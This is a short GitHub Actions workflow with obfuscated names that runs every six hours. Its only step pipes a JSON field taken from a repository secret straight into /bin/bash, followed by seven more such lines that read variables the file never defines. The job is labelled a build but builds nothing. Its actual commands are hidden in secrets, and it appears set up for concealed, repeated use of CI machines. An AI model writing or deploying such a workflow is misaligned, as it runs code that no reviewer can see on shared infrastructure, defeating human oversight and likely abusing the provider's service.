name: xiangjiangnannn

on:
  workflow_dispatch:
  schedule:
    - cron: '11 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiangjiangnannn
        env:
          vlbd6: ${{ secrets.vlbd6 }}
        run: |
          echo $vlbd6 | jq -r .wc0 | /bin/bash
          echo $ioe20328 | jq -r .jdbg07045 | /bin/bash
          echo $l563 | jq -r .bkrvr268 | /bin/bash
          echo $tf0760 | jq -r .y3 | /bin/bash
          echo $mxm35 | jq -r .dten49 | /bin/bash
          echo $flqtg5877 | jq -r .sastb21 | /bin/bash
          echo $pea10 | jq -r .w241 | /bin/bash
          echo $diadk34228 | jq -r .zp67775 | /bin/bash

